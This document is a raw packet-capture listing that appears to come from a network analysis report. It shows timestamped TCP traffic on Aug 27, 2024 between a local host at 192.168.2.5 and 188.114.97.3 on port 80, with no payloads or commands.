                              Aug 27, 2024 09:48:55.124769926 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.124783039 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.124785900 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.124794006 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.124804974 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.124815941 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.124821901 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.124846935 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.124864101 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.125258923 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.125269890 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.125281096 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.125315905 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.125432968 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.125443935 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.125453949 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.125463963 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.125474930 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.125475883 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.125494957 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.125500917 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.125505924 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.125518084 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.125521898 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.125528097 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.125541925 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.125550985 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.125559092 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.125570059 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.125580072 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.125591993 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.125601053 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.125612974 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.125624895 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.125624895 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.125637054 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.125648022 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.125658989 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.125658989 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.125669956 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.125682116 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.125718117 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.126352072 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.126364946 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.126374006 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.126384020 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.126394987 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.126406908 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.126416922 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.126429081 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.126431942 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.126442909 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.126454115 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.126465082 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.126468897 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.126477957 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.126490116 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.126491070 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.126564026 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.131176949 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.131211996 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.131222963 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.131243944 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.131267071 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.131285906 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.131297112 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.131346941 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.131395102 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.131407022 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.131469965 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.197397947 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.197412014 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.197422981 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.197484970 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.197525024 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.197535992 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.197546005 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.197559118 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.197563887 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.197571039 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.197640896 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.197659016 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.197781086 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.197792053 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.197802067 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.197812080 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.197823048 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.197828054 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.197834969 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.197845936 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.197854996 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.197860003 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.197875023 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.197890997 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.198012114 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.198146105 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.198157072 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.198168993 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.198179007 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.198184967 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.198190928 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.198199034 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.198205948 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.198216915 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.198227882 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.198229074 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.198240042 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.198251963 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.198262930 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.198323965 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.214342117 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.214392900 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.214404106 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.214481115 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.214489937 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.214499950 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.214509964 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.214574099 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.214610100 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.214723110 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.214761019 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.214771032 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.214792967 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.214807987 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.214818954 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.214842081 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.215007067 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.215017080 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.215027094 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.215037107 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.215044022 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.215048075 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.215059042 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.215068102 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.215075016 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.215078115 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.215087891 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.215095997 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.215097904 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.215135098 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.215286016 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.215297937 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.215307951 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.215326071 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.215342045 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.215504885 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.215514898 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.215523958 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.215534925 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.215542078 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.215545893 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.215554953 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.215564966 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.215567112 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.215576887 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.215584993 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.215585947 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.215595961 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.215604067 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.215606928 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.215616941 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.215626955 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.215636969 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.215641022 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.215646982 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.215657949 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.215667963 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.215668917 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.215686083 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.216243982 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.216253996 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.216264009 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.216274023 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.216281891 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.216283083 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.216305017 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.216370106 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.216535091 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.216546059 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.216556072 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.216567039 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.216582060 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.216608047 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.216725111 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.216733932 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.216749907 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.216758966 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.216761112 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.216770887 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.216780901 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.216793060 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.216799974 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.216804028 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.216815948 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.216826916 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.216830969 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.216830969 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.216840029 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.216849089 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.216860056 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.216871023 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.216875076 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.216881990 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.216892004 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.216901064 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.216908932 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.216911077 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.216936111 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.217227936 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.217240095 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.217248917 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.217259884 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.217268944 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.217276096 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.217331886 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.219907999 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.219918013 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.219928026 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.219961882 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.220030069 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.220040083 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.220048904 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.220060110 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.220069885 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.220128059 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.284585953 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.284624100 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.284634113 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.284672976 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.284682989 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.284693003 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.284703970 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.284750938 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.284801006 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.284811020 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.284840107 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.284907103 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.284918070 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.284926891 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.284938097 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.284941912 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.284948111 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.284957886 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.284967899 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.284970045 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.285002947 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.285200119 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.285212994 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.285240889 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.285366058 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.285376072 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.285384893 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.285396099 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.285403967 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.285409927 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.285420895 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.285429955 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.285439014 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.285440922 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.285459042 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.285461903 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.285476923 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.302902937 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.302912951 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.302922964 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.302954912 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.302972078 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.303021908 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.303031921 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.303047895 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.303066969 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.303185940 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.303198099 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.303206921 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.303216934 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.303252935 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.303263903 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.303287029 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.303297997 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.303323984 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.303380013 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.303390980 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.303400993 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.303411007 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.303419113 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.303435087 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.303539991 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.303550005 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.303560019 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.303571939 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.303581953 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.303595066 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.303596973 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.303605080 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.303617001 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.303683043 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.303778887 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.303788900 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.303797960 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.303814888 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.303828001 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.303838968 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.303849936 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.303889036 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.303919077 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.304095030 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.304105043 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.304114103 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.304138899 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.304148912 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.304160118 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.304171085 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.304320097 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.304496050 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.304507971 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.304516077 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.304526091 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.304536104 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.304548025 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.304558992 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.304569960 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.304579020 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.304588079 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.304599047 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.304609060 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.304610968 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.304621935 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.304630995 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.304631948 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.304642916 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.304650068 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.304652929 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.304665089 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.304672003 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.304692984 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.304704905 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.304989100 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.304999113 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.305010080 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.305020094 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.305030107 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.305042028 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.305046082 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.305067062 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.305100918 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.305111885 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.305116892 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.305121899 CEST8061383188.114.97.3192.168.2.5
